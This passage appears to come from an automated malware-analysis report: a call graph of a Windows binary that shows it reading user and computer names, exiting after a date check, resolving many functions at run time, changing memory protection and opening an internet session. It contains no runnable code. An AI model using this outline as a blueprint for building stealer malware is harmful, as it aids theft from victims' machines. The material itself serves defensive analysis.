9b67ad ExitProcess 13528->13530 13531 9b67a3 ExitProcess 13528->13531 13532 9b67c1 ExitProcess 13528->13532 13533 9b67b7 ExitProcess 13528->13533 13529->13527 13535 9b78e0 3 API calls 13534->13535 13536 9a119e 13535->13536 13537 9a11cc 13536->13537 13538 9b7850 3 API calls 13536->13538 13541 9b7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13537->13541 13539 9a11b7 13538->13539 13539->13537 13540 9a11c4 ExitProcess 13539->13540 13542 9b6a30 13541->13542 13543 9b78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13542->13543 13544 9b6a43 13543->13544 13545 9ba9b0 13544->13545 13766 9ba710 13545->13766 13547 9ba9c1 lstrlen 13549 9ba9e0 13547->13549 13548 9baa18 13767 9ba7a0 13548->13767 13549->13548 13551 9ba9fa lstrcpy lstrcat 13549->13551 13551->13548 13552 9baa24 13552->13380 13554 9ba8bb 13553->13554 13555 9ba90b 13554->13555 13556 9ba8f9 lstrcpy 13554->13556 13555->13391 13556->13555 13771 9b6820 13557->13771 13559 9b698e 13560 9b6998 sscanf 13559->13560 13800 9ba800 13560->13800 13562 9b69aa SystemTimeToFileTime SystemTimeToFileTime 13563 9b69e0 13562->13563 13565 9b69ce 13562->13565 13566 9b5b10 13563->13566 13564 9b69d8 ExitProcess 13565->13563 13565->13564 13567 9b5b1d 13566->13567 13568 9ba740 lstrcpy 13567->13568 13569 9b5b2e 13568->13569 13802 9ba820 lstrlen 13569->13802 13572 9ba820 2 API calls 13573 9b5b64 13572->13573 13574 9ba820 2 API calls 13573->13574 13575 9b5b74 13574->13575 13806 9b6430 13575->13806 13578 9ba820 2 API calls 13579 9b5b93 13578->13579 13580 9ba820 2 API calls 13579->13580 13581 9b5ba0 13580->13581 13582 9ba820 2 API calls 13581->13582 13583 9b5bad 13582->13583 13584 9ba820 2 API calls 13583->13584 13585 9b5bf9 13584->13585 13815 9a26a0 13585->13815 13593 9b5cc3 13594 9b6430 lstrcpy 13593->13594 13595 9b5cd5 13594->13595 13596 9ba7a0 lstrcpy 13595->13596 13597 9b5cf2 13596->13597 13598 9ba9b0 4 API calls 13597->13598 13599 9b5d0a 13598->13599 13600 9ba8a0 lstrcpy 13599->13600 13601 9b5d16 13600->13601 13602 9ba9b0 4 API calls 13601->13602 13603 9b5d3a 13602->13603 13604 9ba8a0 lstrcpy 13603->13604 13605 9b5d46 13604->13605 13606 9ba9b0 4 API calls 13605->13606 13607 9b5d6a 13606->13607 13608 9ba8a0 lstrcpy 13607->13608 13609 9b5d76 13608->13609 13610 9ba740 lstrcpy 13609->13610 13611 9b5d9e 13610->13611 14541 9b7500 GetWindowsDirectoryA 13611->14541 13614 9ba7a0 lstrcpy 13615 9b5db8 13614->13615 14551 9a4880 13615->14551 13617 9b5dbe 14697 9b17a0 13617->14697 13619 9b5dc6 13620 9ba740 lstrcpy 13619->13620 13621 9b5de9 13620->13621 13622 9a1590 lstrcpy 13621->13622 13623 9b5dfd 13622->13623 14713 9a5960 13623->14713 13625 9b5e03 14857 9b1050 13625->14857 13627 9b5e0e 13628 9ba740 lstrcpy 13627->13628 13629 9b5e32 13628->13629 13630 9a1590 lstrcpy 13629->13630 13631 9b5e46 13630->13631 13632 9a5960 34 API calls 13631->13632 13633 9b5e4c 13632->13633 14861 9b0d90 13633->14861 13635 9b5e57 13636 9ba740 lstrcpy 13635->13636 13637 9b5e79 13636->13637 13638 9a1590 lstrcpy 13637->13638 13639 9b5e8d 13638->13639 13640 9a5960 34 API calls 13639->13640 13641 9b5e93 13640->13641 14868 9b0f40 13641->14868 13643 9b5e9e 13644 9a1590 lstrcpy 13643->13644 13645 9b5eb5 13644->13645 14873 9b1a10 13645->14873 13647 9b5eba 13648 9ba740 lstrcpy 13647->13648 13649 9b5ed6 13648->13649 15217 9a4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13649->15217 13651 9b5edb 13652 9a1590 lstrcpy 13651->13652 13653 9b5f5b 13652->13653 15224 9b0740 13653->15224 13655 9b5f60 13656 9ba740 lstrcpy 13655->13656 13657 9b5f86 13656->13657 13658 9a1590 lstrcpy 13657->13658 13659 9b5f9a 13658->13659 13660 9a5960 34 API calls 13659->13660 13661 9b5fa0 13660->13661 13755 9a45d1 RtlAllocateHeap 13754->13755 13757 9a4621 VirtualProtect 13755->13757 13757->13403 13759->13490 13762 9a10c2 ctype 13760->13762 13761 9a10fd 13761->13520 13762->13761 13763 9a10e2 VirtualFree 13762->13763 13763->13761 13765 9a1233 GlobalMemoryStatusEx 13764->13765 13765->13523 13766->13547 13768 9ba7c2 13767->13768 13769 9ba7ec 13768->13769 13770 9ba7da lstrcpy 13768->13770 13769->13552 13770->13769 13772 9ba740 lstrcpy 13771->13772 13773 9b6833 13772->13773 13774 9ba9b0 4 API calls 13773->13774 13775 9b6845 13774->13775 13776 9ba8a0 lstrcpy 13775->13776 13777 9b684e 13776->13777 13778 9ba9b0 4 API calls 13777->13778 13779 9b6867 13778->13779 13780 9ba8a0 lstrcpy 13779->13780 13781 9b6870 13780->13781 13782 9ba9b0 4 API calls 13781->13782 13783 9b688a 13782->13783 13784 9ba8a0 lstrcpy 13783->13784 13785 9b6893 13784->13785 13786 9ba9b0 4 API calls 13785->13786 13787 9b68ac 13786->13787 13788 9ba8a0 lstrcpy 13787->13788 13789 9b68b5 13788->13789 13790 9ba9b0 4 API calls 13789->13790 13791 9b68cf 13790->13791 13792 9ba8a0 lstrcpy 13791->13792 13793 9b68d8 13792->13793 13794 9ba9b0 4 API calls 13793->13794 13795 9b68f3 13794->13795 13796 9ba8a0 lstrcpy 13795->13796 13797 9b68fc 13796->13797 13798 9ba7a0 lstrcpy 13797->13798 13799 9b6910 13798->13799 13799->13559 13801 9ba812 13800->13801 13801->13562 13803 9ba83f 13802->13803 13804 9b5b54 13803->13804 13805 9ba87b lstrcpy 13803->13805 13804->13572 13805->13804 13807 9ba8a0 lstrcpy 13806->13807 13808 9b6443 13807->13808 13809 9ba8a0 lstrcpy 13808->13809 13810 9b6455 13809->13810 13811 9ba8a0 lstrcpy 13810->13811 13812 9b6467 13811->13812 13813 9ba8a0 lstrcpy 13812->13813 13814 9b5b86 13813->13814 13814->13578 13816 9a45c0 2 API calls 13815->13816 13817 9a26b4 13816->13817 13818 9a45c0 2 API calls 13817->13818 13819 9a26d7 13818->13819 13820 9a45c0 2 API calls 13819->13820 13821 9a26f0 13820->13821 13822 9a45c0 2 API calls 13821->13822 13823 9a2709 13822->13823 13824 9a45c0 2 API calls 13823->13824 13825 9a2736 13824->13825 13826 9a45c0 2 API calls 13825->13826 13827 9a274f 13826->13827 13828 9a45c0 2 API calls 13827->13828 13829 9a2768 13828->13829 13830 9a45c0 2 API calls 13829->13830 13831 9a2795 13830->13831 13832 9a45c0 2 API calls 13831->13832 13833 9a27ae 13832->13833 13834 9a45c0 2 API calls 13833->13834 13835 9a27c7 13834->13835 13836 9a45c0 2 API calls 13835->13836 13837 9a27e0 13836->13837 13838 9a45c0 2 API calls 13837->13838 13839 9a27f9 13838->13839 13840 9a45c0 2 API calls 13839->13840 13841 9a2812 13840->13841 13842 9a45c0 2 API calls 13841->13842 13843 9a282b 13842->13843 13844 9a45c0 2 API calls 13843->13844 13845 9a2844 13844->13845 13846 9a45c0 2 API calls 13845->13846 13847 9a285d 13846->13847 13848 9a45c0 2 API calls 13847->13848 13849 9a2876 13848->13849 13850 9a45c0 2 API calls 13849->13850 13851 9a288f 13850->13851 13852 9a45c0 2 API calls 13851->13852 13853 9a28a8 13852->13853 13854 9a45c0 2 API calls 13853->13854 13855 9a28c1 13854->13855 13856 9a45c0 2 API calls 13855->13856 13857 9a28da 13856->13857 13858 9a45c0 2 API calls 13857->13858 13859 9a28f3 13858->13859 13860 9a45c0 2 API calls 13859->13860 13861 9a290c 13860->13861 13862 9a45c0 2 API calls 13861->13862 13863 9a2925 13862->13863 13864 9a45c0 2 API calls 13863->13864 13865 9a293e 13864->13865 13866 9a45c0 2 API calls 13865->13866 13867 9a2957 13866->13867 13868 9a45c0 2 API calls 13867->13868 13869 9a2970 13868->13869 13870 9a45c0 2 API calls 13869->13870 13871 9a2989 13870->13871 13872 9a45c0 2 API calls 13871->13872 13873 9a29a2 13872->13873 13874 9a45c0 2 API calls 13873->13874 13875 9a29bb 13874->13875 13876 9a45c0 2 API calls 13875->13876 13877 9a29d4 13876->13877 13878 9a45c0 2 API calls 13877->13878 13879 9a29ed 13878->13879 13880 9a45c0 2 API calls 13879->13880 13881 9a2a06 13880->13881 13882 9a45c0 2 API calls 13881->13882 13883 9a2a1f 13882->13883 13884 9a45c0 2 API calls 13883->13884 13885 9a2a38 13884->13885 13886 9a45c0 2 API calls 13885->13886 13887 9a2a51 13886->13887 13888 9a45c0 2 API calls 13887->13888 13889 9a2a6a 13888->13889 13890 9a45c0 2 API calls 13889->13890 13891 9a2a83 13890->13891 13892 9a45c0 2 API calls 13891->13892 13893 9a2a9c 13892->13893 13894 9a45c0 2 API calls 13893->13894 13895 9a2ab5 13894->13895 13896 9a45c0 2 API calls 13895->13896 13897 9a2ace 13896->13897 13898 9a45c0 2 API calls 13897->13898 13899 9a2ae7 13898->13899 13900 9a45c0 2 API calls 13899->13900 13901 9a2b00 13900->13901 13902 9a45c0 2 API calls 13901->13902 13903 9a2b19 13902->13903 13904 9a45c0 2 API calls 13903->13904 13905 9a2b32 13904->13905 13906 9a45c0 2 API calls 13905->13906 13907 9a2b4b 13906->13907 13908 9a45c0 2 API calls 13907->13908 13909 9a2b64 13908->13909 13910 9a45c0 2 API calls 13909->13910 13911 9a2b7d 13910->13911 13912 9a45c0 2 API calls 13911->13912 13913 9a2b96 13912->13913 13914 9a45c0 2 API calls 13913->13914 13915 9a2baf 13914->13915 13916 9a45c0 2 API calls 13915->13916 13917 9a2bc8 13916->13917 13918 9a45c0 2 API calls 13917->13918 13919 9a2be1 13918->13919 13920 9a45c0 2 API calls 13919->13920 13921 9a2bfa 13920->13921 13922 9a45c0 2 API calls 13921->13922 13923 9a2c13 13922->13923 13924 9a45c0 2 API calls 13923->13924 13925 9a2c2c 13924->13925 13926 9a45c0 2 API calls 13925->13926 13927 9a2c45 13926->13927 13928 9a45c0 2 API calls 13927->13928 13929 9a2c5e 13928->13929 13930 9a45c0 2 API calls 13929->13930 13931 9a2c77 13930->13931 13932 9a45c0 2 API calls 13931->13932 13933 9a2c90 13932->13933 13934 9a45c0 2 API calls 13933->13934 13935 9a2ca9 13934->13935 13936 9a45c0 2 API calls 13935->13936 13937 9a2cc2 13936->13937 13938 9a45c0 2 API calls 13937->13938 13939 9a2cdb 13938->13939 13940 9a45c0 2 API calls 13939->13940 13941 9a2cf4 13940->13941 13942 9a45c0 2 API calls 13941->13942 13943 9a2d0d 13942->13943 13944 9a45c0 2 API calls 13943->13944 13945 9a2d26 13944->13945 13946 9a45c0 2 API calls 13945->13946 13947 9a2d3f 13946->13947 13948 9a45c0 2 API calls 13947->13948 13949 9a2d58 13948->13949 13950 9a45c0 2 API calls 13949->13950 13951 9a2d71 13950->13951 13952 9a45c0 2 API calls 13951->13952 13953 9a2d8a 13952->13953 13954 9a45c0 2 API calls 13953->13954 13955 9a2da3 13954->13955 13956 9a45c0 2 API calls 13955->13956 13957 9a2dbc 13956->13957 13958 9a45c0 2 API calls 13957->13958 13959 9a2dd5 13958->13959 13960 9a45c0 2 API calls 13959->13960 13961 9a2dee 13960->13961 13962 9a45c0 2 API calls 13961->13962 13963 9a2e07 13962->13963 13964 9a45c0 2 API calls 13963->13964 13965 9a2e20 13964->13965 13966 9a45c0 2 API calls 13965->13966 13967 9a2e39 13966->13967 13968 9a45c0 2 API calls 13967->13968 13969 9a2e52 13968->13969 13970 9a45c0 2 API calls 13969->13970 13971 9a2e6b 13970->13971 13972 9a45c0 2 API calls 13971->13972 13973 9a2e84 13972->13973 13974 9a45c0 2 API calls 13973->13974 13975 9a2e9d 13974->13975 13976 9a45c0 2 API calls 13975->13976 13977 9a2eb6 13976->13977 13978 9a45c0 2 API calls 13977->13978 13979 9a2ecf 13978->13979 13980 9a45c0 2 API calls 13979->13980 13981 9a2ee8 13980->13981 13982 9a45c0 2 API calls 13981->13982 13983 9a2f01 13982->13983 13984 9a45c0 2 API calls 13983->13984 13985 9a2f1a 13984->13985 13986 9a45c0 2 API calls 13985->13986 13987 9a2f33 13986->13987 13988 9a45c0 2 API calls 13987->13988 13989 9a2f4c 13988->13989 13990 9a45c0 2 API calls 13989->13990 13991 9a2f65 13990->13991 13992 9a45c0 2 API calls 13991->13992 13993 9a2f7e 13992->13993 13994 9a45c0 2 API calls 13993->13994 13995 9a2f97 13994->13995 13996 9a45c0 2 API calls 13995->13996 13997 9a2fb0 13996->13997 13998 9a45c0 2 API calls 13997->13998 13999 9a2fc9 13998->13999 14000 9a45c0 2 API calls 13999->14000 14001 9a2fe2 14000->14001 14002 9a45c0 2 API calls 14001->14002 14003 9a2ffb 14002->14003 14004 9a45c0 2 API calls 14003->14004 14005 9a3014 14004->14005 14006 9a45c0 2 API calls 14005->14006 14007 9a302d 14006->14007 14008 9a45c0 2 API calls 14007->14008 14009 9a3046 14008->14009 14010 9a45c0 2 API calls 14009->14010 14011 9a305f 14010->14011 14012 9a45c0 2 API calls 14011->14012 14013 9a3078 14012->14013 14014 9a45c0 2 API calls 14013->14014 14015 9a3091 14014->14015 14016 9a45c0 2 API calls 14015->14016 14017 9a30aa 14016->14017 14018 9a45c0 2 API calls 14017->14018 14019 9a30c3 14018->14019 14020 9a45c0 2 API calls 14019->14020 14021 9a30dc 14020->14021 14022 9a45c0 2 API calls 14021->14022 14023 9a30f5 14022->14023 14024 9a45c0 2 API calls 14023->14024 14025 9a310e 14024->14025 14026 9a45c0 2 API calls 14025->14026 14027 9a3127 14026->14027 14028 9a45c0 2 API calls 14027->14028 14029 9a3140 14028->14029 14030 9a45c0 2 API calls 14029->14030 14031 9a3159 14030->14031 14032 9a45c0 2 API calls 14031->14032 14033 9a3172 14032->14033 14034 9a45c0 2 API calls 14033->14034 14035 9a318b 14034->14035 14036 9a45c0 2 API calls 14035->14036 14037 9a31a4 14036->14037 14038 9a45c0 2 API calls 14037->14038 14039 9a31bd 14038->14039 14040 9a45c0 2 API calls 14039->14040 14041 9a31d6 14040->14041 14042 9a45c0 2 API calls 14041->14042 14043 9a31ef 14042->14043 14044 9a45c0 2 API calls 14043->14044 14045 9a3208 14044->14045 14046 9a45c0 2 API calls 14045->14046 14047 9a3221 14046->14047 14048 9a45c0 2 API calls 14047->14048 14049 9a323a 14048->14049 14050 9a45c0 2 API calls 14049->14050 14051 9a3253 14050->14051 14052 9a45c0 2 API calls 14051->14052 14053 9a326c 14052->14053 14054 9a45c0 2 API calls 14053->14054 14055 9a3285 14054->14055 14056 9a45c0 2 API calls 14055->14056 14057 9a329e 14056->14057 14058 9a45c0 2 API calls 14057->14058 14059 9a32b7 14058->14059 14060 9a45c0 2 API calls 14059->14060 14061 9a32d0 14060->14061 14062 9a45c0 2 API calls 14061->14062 14063 9a32e9 14062->14063 14064 9a45c0 2 API calls 14063->14064 14065 9a3302 14064->14065 14066 9a45c0 2 API calls 14065->14066 14067 9a331b 14066->14067 14068 9a45c0 2 API calls 14067->14068 14069 9a3334 14068->14069 14070 9a45c0 2 API calls 14069->14070 14071 9a334d 14070->14071 14072 9a45c0 2 API calls 14071->14072 14073 9a3366 14072->14073 14074 9a45c0 2 API calls 14073->14074 14075 9a337f 14074->14075 14076 9a45c0 2 API calls 14075->14076 14077 9a3398 14076->14077 14078 9a45c0 2 API calls 14077->14078 14079 9a33b1 14078->14079 14080 9a45c0 2 API calls 14079->14080 14081 9a33ca 14080->14081 14082 9a45c0 2 API calls 14081->14082 14083 9a33e3 14082->14083 14084 9a45c0 2 API calls 14083->14084 14085 9a33fc 14084->14085 14086 9a45c0 2 API calls 14085->14086 14087 9a3415 14086->14087 14088 9a45c0 2 API calls 14087->14088 14089 9a342e 14088->14089 14090 9a45c0 2 API calls 14089->14090 14091 9a3447 14090->14091 14092 9a45c0 2 API calls 14091->14092 14093 9a3460 14092->14093 14094 9a45c0 2 API calls 14093->14094 14095 9a3479 14094->14095 14096 9a45c0 2 API calls 14095->14096 14097 9a3492 14096->14097 14098 9a45c0 2 API calls 14097->14098 14099 9a34ab 14098->14099 14100 9a45c0 2 API calls 14099->14100 14101 9a34c4 14100->14101 14102 9a45c0 2 API calls 14101->14102 14103 9a34dd 14102->14103 14104 9a45c0 2 API calls 14103->14104 14105 9a34f6 14104->14105 14106 9a45c0 2 API calls 14105->14106 14107 9a350f 14106->14107 14108 9a45c0 2 API calls 14107->14108 14109 9a3528 14108->14109 14110 9a45c0 2 API calls 14109->14110 14111 9a3541 14110->14111 14112 9a45c0 2 API calls 14111->14112 14113 9a355a 14112->14113 14114 9a45c0 2 API calls 14113->14114 14115 9a3573 14114->14115 14116 9a45c0 2 API calls 14115->14116 14117 9a358c 14116->14117 14118 9a45c0 2 API calls 14117->14118 14119 9a35a5 14118->14119 14120 9a45c0 2 API calls 14119->14120 14121 9a35be 14120->14121 14122 9a45c0 2 API calls 14121->14122 14123 9a35d7 14122->14123 14124 9a45c0 2 API calls 14123->14124 14125 9a35f0 14124->14125 14126 9a45c0 2 API calls 14125->14126 14127 9a3609 14126->14127 14128 9a45c0 2 API calls 14127->14128 14129 9a3622 14128->14129 14130 9a45c0 2 API calls 14129->14130 14131 9a363b 14130->14131 14132 9a45c0 2 API calls 14131->14132 14133 9a3654 14132->14133 14134 9a45c0 2 API calls 14133->14134 14135 9a366d 14134->14135 14136 9a45c0 2 API calls 14135->14136 14137 9a3686 14136->14137 14138 9a45c0 2 API calls 14137->14138 14139 9a369f 14138->14139 14140 9a45c0 2 API calls 14139->14140 14141 9a36b8 14140->14141 14142 9a45c0 2 API calls 14141->14142 14143 9a36d1 14142->14143 14144 9a45c0 2 API calls 14143->14144 14145 9a36ea 14144->14145 14146 9a45c0 2 API calls 14145->14146 14147 9a3703 14146->14147 14148 9a45c0 2 API calls 14147->14148 14149 9a371c 14148->14149 14150 9a45c0 2 API calls 14149->14150 14151 9a3735 14150->14151 14152 9a45c0 2 API calls 14151->14152 14153 9a374e 14152->14153 14154 9a45c0 2 API calls 14153->14154 14155 9a3767 14154->14155 14156 9a45c0 2 API calls 14155->14156 14157 9a3780 14156->14157 14158 9a45c0 2 API calls 14157->14158 14159 9a3799 14158->14159 14160 9a45c0 2 API calls 14159->14160 14161 9a37b2 14160->14161 14162 9a45c0 2 API calls 14161->14162 14163 9a37cb 14162->14163 14164 9a45c0 2 API calls 14163->14164 14165 9a37e4 14164->14165 14166 9a45c0 2 API calls 14165->14166 14167 9a37fd 14166->14167 14168 9a45c0 2 API calls 14167->14168 14169 9a3816 14168->14169 14170 9a45c0 2 API calls 14169->14170 14171 9a382f 14170->14171 14172 9a45c0 2 API calls 14171->14172 14173 9a3848 14172->14173 14174 9a45c0 2 API calls 14173->14174 14175 9a3861 14174->14175 14176 9a45c0 2 API calls 14175->14176 14177 9a387a 14176->14177 14178 9a45c0 2 API calls 14177->14178 14179 9a3893 14178->14179 14180 9a45c0 2 API calls 14179->14180 14181 9a38ac 14180->14181 14182 9a45c0 2 API calls 14181->14182 14183 9a38c5 14182->14183 14184 9a45c0 2 API calls 14183->14184 14185 9a38de 14184->14185 14186 9a45c0 2 API calls 14185->14186 14187 9a38f7 14186->14187 14188 9a45c0 2 API calls 14187->14188 14189 9a3910 14188->14189 14190 9a45c0 2 API calls 14189->14190 14191 9a3929 14190->14191 14192 9a45c0 2 API calls 14191->14192 14193 9a3942 14192->14193 14194 9a45c0 2 API calls 14193->14194 14195 9a395b 14194->14195 14196 9a45c0 2 API calls 14195->14196 14197 9a3974 14196->14197 14198 9a45c0 2 API calls 14197->14198 14199 9a398d 14198->14199 14200 9a45c0 2 API calls 14199->14200 14201 9a39a6 14200->14201 14202 9a45c0 2 API calls 14201->14202 14203 9a39bf 14202->14203 14204 9a45c0 2 API calls 14203->14204 14205 9a39d8 14204->14205 14206 9a45c0 2 API calls 14205->14206 14207 9a39f1 14206->14207 14208 9a45c0 2 API calls 14207->14208 14209 9a3a0a 14208->14209 14210 9a45c0 2 API calls 14209->14210 14211 9a3a23 14210->14211 14212 9a45c0 2 API calls 14211->14212 14213 9a3a3c 14212->14213 14214 9a45c0 2 API calls 14213->14214 14215 9a3a55 14214->14215 14216 9a45c0 2 API calls 14215->14216 14217 9a3a6e 14216->14217 14218 9a45c0 2 API calls 14217->14218 14219 9a3a87 14218->14219 14220 9a45c0 2 API calls 14219->14220 14221 9a3aa0 14220->14221 14222 9a45c0 2 API calls 14221->14222 14223 9a3ab9 14222->14223 14224 9a45c0 2 API calls 14223->14224 14225 9a3ad2 14224->14225 14226 9a45c0 2 API calls 14225->14226 14227 9a3aeb 14226->14227 14228 9a45c0 2 API calls 14227->14228 14229 9a3b04 14228->14229 14230 9a45c0 2 API calls 14229->14230 14231 9a3b1d 14230->14231 14232 9a45c0 2 API calls 14231->14232 14233 9a3b36 14232->14233 14234 9a45c0 2 API calls 14233->14234 14235 9a3b4f 14234->14235 14236 9a45c0 2 API calls 14235->14236 14237 9a3b68 14236->14237 14238 9a45c0 2 API calls 14237->14238 14239 9a3b81 14238->14239 14240 9a45c0 2 API calls 14239->14240 14241 9a3b9a 14240->14241 14242 9a45c0 2 API calls 14241->14242 14243 9a3bb3 14242->14243 14244 9a45c0 2 API calls 14243->14244 14245 9a3bcc 14244->14245 14246 9a45c0 2 API calls 14245->14246 14247 9a3be5 14246->14247 14248 9a45c0 2 API calls 14247->14248 14249 9a3bfe 14248->14249 14250 9a45c0 2 API calls 14249->14250 14251 9a3c17 14250->14251 14252 9a45c0 2 API calls 14251->14252 14253 9a3c30 14252->14253 14254 9a45c0 2 API calls 14253->14254 14255 9a3c49 14254->14255 14256 9a45c0 2 API calls 14255->14256 14257 9a3c62 14256->14257 14258 9a45c0 2 API calls 14257->14258 14259 9a3c7b 14258->14259 14260 9a45c0 2 API calls 14259->14260 14261 9a3c94 14260->14261 14262 9a45c0 2 API calls 14261->14262 14263 9a3cad 14262->14263 14264 9a45c0 2 API calls 14263->14264 14265 9a3cc6 14264->14265 14266 9a45c0 2 API calls 14265->14266 14267 9a3cdf 14266->14267 14268 9a45c0 2 API calls 14267->14268 14269 9a3cf8 14268->14269 14270 9a45c0 2 API calls 14269->14270 14271 9a3d11 14270->14271 14272 9a45c0 2 API calls 14271->14272 14273 9a3d2a 14272->14273 14274 9a45c0 2 API calls 14273->14274 14275 9a3d43 14274->14275 14276 9a45c0 2 API calls 14275->14276 14277 9a3d5c 14276->14277 14278 9a45c0 2 API calls 14277->14278 14279 9a3d75 14278->14279 14280 9a45c0 2 API calls 14279->14280 14281 9a3d8e 14280->14281 14282 9a45c0 2 API calls 14281->14282 14283 9a3da7 14282->14283 14284 9a45c0 2 API calls 14283->14284 14285 9a3dc0 14284->14285 14286 9a45c0 2 API calls 14285->14286 14287 9a3dd9 14286->14287 14288 9a45c0 2 API calls 14287->14288 14289 9a3df2 14288->14289 14290 9a45c0 2 API calls 14289->14290 14291 9a3e0b 14290->14291 14292 9a45c0 2 API calls 14291->14292 14293 9a3e24 14292->14293 14294 9a45c0 2 API calls 14293->14294 14295 9a3e3d 14294->14295 14296 9a45c0 2 API calls 14295->14296 14297 9a3e56 14296->14297 14298 9a45c0 2 API calls 14297->14298 14299 9a3e6f 14298->14299 14300 9a45c0 2 API calls 14299->14300 14301 9a3e88 14300->14301 14302 9a45c0 2 API calls 14301->14302 14303 9a3ea1 14302->14303 14304 9a45c0 2 API calls 14303->14304 14305 9a3eba 14304->14305 14306 9a45c0 2 API calls 14305->14306 14307 9a3ed3 14306->14307 14308 9a45c0 2 API calls 14307->14308 14309 9a3eec 14308->14309 14310 9a45c0 2 API calls 14309->14310 14311 9a3f05 14310->14311 14312 9a45c0 2 API calls 14311->14312 14313 9a3f1e 14312->14313 14314 9a45c0 2 API calls 14313->14314 14315 9a3f37 14314->14315 14316 9a45c0 2 API calls 14315->14316 14317 9a3f50 14316->14317 14318 9a45c0 2 API calls 14317->14318 14319 9a3f69 14318->14319 14320 9a45c0 2 API calls 14319->14320 14321 9a3f82 14320->14321 14322 9a45c0 2 API calls 14321->14322 14323 9a3f9b 14322->14323 14324 9a45c0 2 API calls 14323->14324 14325 9a3fb4 14324->14325 14326 9a45c0 2 API calls 14325->14326 14327 9a3fcd 14326->14327 14328 9a45c0 2 API calls 14327->14328 14329 9a3fe6 14328->14329 14330 9a45c0 2 API calls 14329->14330 14331 9a3fff 14330->14331 14332 9a45c0 2 API calls 14331->14332 14333 9a4018 14332->14333 14334 9a45c0 2 API calls 14333->14334 14335 9a4031 14334->14335 14336 9a45c0 2 API calls 14335->14336 14337 9a404a 14336->14337 14338 9a45c0 2 API calls 14337->14338 14339 9a4063 14338->14339 14340 9a45c0 2 API calls 14339->14340 14341 9a407c 14340->14341 14342 9a45c0 2 API calls 14341->14342 14343 9a4095 14342->14343 14344 9a45c0 2 API calls 14343->14344 14345 9a40ae 14344->14345 14346 9a45c0 2 API calls 14345->14346 14347 9a40c7 14346->14347 14348 9a45c0 2 API calls 14347->14348 14349 9a40e0 14348->14349 14350 9a45c0 2 API calls 14349->14350 14351 9a40f9 14350->14351 14352 9a45c0 2 API calls 14351->14352 14353 9a4112 14352->14353 14354 9a45c0 2 API calls 14353->14354 14355 9a412b 14354->14355 14356 9a45c0 2 API calls 14355->14356 14357 9a4144 14356->14357 14358 9a45c0 2 API calls 14357->14358 14359 9a415d 14358->14359 14360 9a45c0 2 API calls 14359->14360 14361 9a4176 14360->14361 14362 9a45c0 2 API calls 14361->14362 14363 9a418f 14362->14363 14364 9a45c0 2 API calls 14363->14364 14365 9a41a8 14364->14365 14366 9a45c0 2 API calls 14365->14366 14367 9a41c1 14366->14367 14368 9a45c0 2 API calls 14367->14368 14369 9a41da 14368->14369 14370 9a45c0 2 API calls 14369->14370 14371 9a41f3 14370->14371 14372 9a45c0 2 API calls 14371->14372 14373 9a420c 14372->14373 14374 9a45c0 2 API calls 14373->14374 14375 9a4225 14374->14375 14376 9a45c0 2 API calls 14375->14376 14377 9a423e 14376->14377 14378 9a45c0 2 API calls 14377->14378 14379 9a4257 14378->14379 14380 9a45c0 2 API calls 14379->14380 14381 9a4270 14380->14381 14382 9a45c0 2 API calls 14381->14382 14383 9a4289 14382->14383 14384 9a45c0 2 API calls 14383->14384 14385 9a42a2 14384->14385 14386 9a45c0 2 API calls 14385->14386 14387 9a42bb 14386->14387 14388 9a45c0 2 API calls 14387->14388 14389 9a42d4 14388->14389 14390 9a45c0 2 API calls 14389->14390 14391 9a42ed 14390->14391 14392 9a45c0 2 API calls 14391->14392 14393 9a4306 14392->14393 14394 9a45c0 2 API calls 14393->14394 14395 9a431f 14394->14395 14396 9a45c0 2 API calls 14395->14396 14397 9a4338 14396->14397 14398 9a45c0 2 API calls 14397->14398 14399 9a4351 14398->14399 14400 9a45c0 2 API calls 14399->14400 14401 9a436a 14400->14401 14402 9a45c0 2 API calls 14401->14402 14403 9a4383 14402->14403 14404 9a45c0 2 API calls 14403->14404 14405 9a439c 14404->14405 14406 9a45c0 2 API calls 14405->14406 14407 9a43b5 14406->14407 14408 9a45c0 2 API calls 14407->14408 14409 9a43ce 14408->14409 14410 9a45c0 2 API calls 14409->14410 14411 9a43e7 14410->14411 14412 9a45c0 2 API calls 14411->14412 14413 9a4400 14412->14413 14414 9a45c0 2 API calls 14413->14414 14415 9a4419 14414->14415 14416 9a45c0 2 API calls 14415->14416 14417 9a4432 14416->14417 14418 9a45c0 2 API calls 14417->14418 14419 9a444b 14418->14419 14420 9a45c0 2 API calls 14419->14420 14421 9a4464 14420->14421 14422 9a45c0 2 API calls 14421->14422 14423 9a447d 14422->14423 14424 9a45c0 2 API calls 14423->14424 14425 9a4496 14424->14425 14426 9a45c0 2 API calls 14425->14426 14427 9a44af 14426->14427 14428 9a45c0 2 API calls 14427->14428 14429 9a44c8 14428->14429 14430 9a45c0 2 API calls 14429->14430 14431 9a44e1 14430->14431 14432 9a45c0 2 API calls 14431->14432 14433 9a44fa 14432->14433 14434 9a45c0 2 API calls 14433->14434 14435 9a4513 14434->14435 14436 9a45c0 2 API calls 14435->14436 14437 9a452c 14436->14437 14438 9a45c0 2 API calls 14437->14438 14439 9a4545 14438->14439 14440 9a45c0 2 API calls 14439->14440 14441 9a455e 14440->14441 14442 9a45c0 2 API calls 14441->14442 14443 9a4577 14442->14443 14444 9a45c0 2 API calls 14443->14444 14445 9a4590 14444->14445 14446 9a45c0 2 API calls 14445->14446 14447 9a45a9 14446->14447 14448 9b9c10 14447->14448 14449 9b9c20 43 API calls 14448->14449 14450 9ba036 8 API calls 14448->14450 14449->14450 14451 9ba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14450->14451 14452 9ba146 14450->14452 14451->14452 14453 9ba153 8 API calls 14452->14453 14454 9ba216 14452->14454 14453->14454 14455 9ba298 14454->14455 14456 9ba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14454->14456 14457 9ba337 14455->14457 14458 9ba2a5 6 API calls 14455->14458 14456->14455 14459 9ba41f 14457->14459 14460 9ba344 9 API calls 14457->14460 14458->14457 14461 9ba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14459->14461 14462 9ba4a2 14459->14462 14460->14459 14461->14462 14463 9ba4ab GetProcAddress GetProcAddress 14462->14463 14464 9ba4dc 14462->14464 14463->14464 14465 9ba515 14464->14465 14466 9ba4e5 GetProcAddress GetProcAddress 14464->14466 14467 9ba612 14465->14467 14468 9ba522 10 API calls 14465->14468 14466->14465 14469 9ba61b 